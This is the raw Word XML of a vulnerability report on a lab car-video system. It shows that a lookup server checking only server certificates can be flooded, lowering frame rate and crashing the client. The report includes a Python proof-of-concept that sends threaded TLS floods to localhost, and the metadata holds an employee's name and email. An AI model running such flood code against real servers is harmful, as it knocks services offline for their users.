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46" w:rsidRDefault="003C1455">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability 4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When making a TLS connection with the Lookup server, only the server is authenticated</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>, not mutual authentication, so if there is only RootCA, an attacker can access the Lookup server using a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> DoS attack</w:t>
      </w:r>
      <w:r>
        <w:t>.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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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PoC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spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Trigger point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spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>(Start message transmit and receive time * 80) &lt; recent message transmit and receive time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spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">then 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spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>print “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>OH !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>!!” message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spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In the local environment, We start the Tartan tool and start the video mode simulation. First capture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the car is normal situation which is fast(fps=30.32).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2826384" cy="2248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4" cy="224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6B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">We start the DDos attack and the video starts to slow down(fps = 20). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2792662" cy="208289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662" cy="2082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4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>and then client become a trigger point and prints “OH message” and stop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="57312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455" w:rsidRDefault="003C1455">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="003C1455" w:rsidRDefault="003C1455">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Or open CV occure Error (CV::OutOfMemmoryError)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1455" w:rsidRDefault="003C1455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F86A38D" wp14:editId="1DA03AB5">
            <wp:extent cx="5733415" cy="894715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46" w:rsidRDefault="003C1455">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455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Attacker Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>import ssl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>HOST = 'localhost'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>PORT = 2222</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">context = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssl.SSLContext</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(ssl.PROTOCOL_TLS_CLIENT)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>context.load_verify_locations('rootca.crt')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>#context.load_verify_locations('serverCrt.pem')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>context.check_hostname = False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>pn = "LKY1360"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>def ge</w:t>
      </w:r>
      <w:r>
        <w:t>tHtml():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">    with socket.socket(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>socket.AF</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_INET, socket.SOCK_STREAM) as sock:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">        #with context.wrap_socket(sock, server_hostname='pylib') as s:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">        with context.wrap_socket(sock, server_hostname='2Team') as s:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">            s.connect((HOST, PORT))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">          while True:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">               # time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">                sendMsgHdr=(len(pn)+1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">                sendMsgHdr2=sendMsgHdr.to_bytes(2, 'big')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">                s.sendall(sendMsgHdr2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">                #print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'Data :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {} , Data Length : {}'.format(pn, sendMsgHdr2))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">                s.sendall(pn.encode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>n_threads = 30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># Splitting the items into chunks equal to number of threads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>thread_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>for thr in range(n_threads):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">    ti</w:t>
      </w:r>
      <w:r>
        <w:t>me.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">    thread = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>threading.Thread</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(target=getHtml)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">    thread_list.append(thread)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">    thread_list[thr]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t>for thread in thread_list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="003C1455">
      <w:r>
        <w:t xml:space="preserve">    thread.join()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4146" w:rsidRDefault="006B4146"/>
    <w:sectPr w:rsidR="006B41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002B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AEAD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46"/>
    <w:rsid w:val="003C1455"/>
    <w:rsid w:val="006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E94C9-1F5D-4956-ACF4-2DA3FF00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김현민/선임연구원/미래기술센터 C&amp;M표준(연)6G초고속전송솔루션Task(hyunmin02.kim@lge.com)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-05T02:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-05T02:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>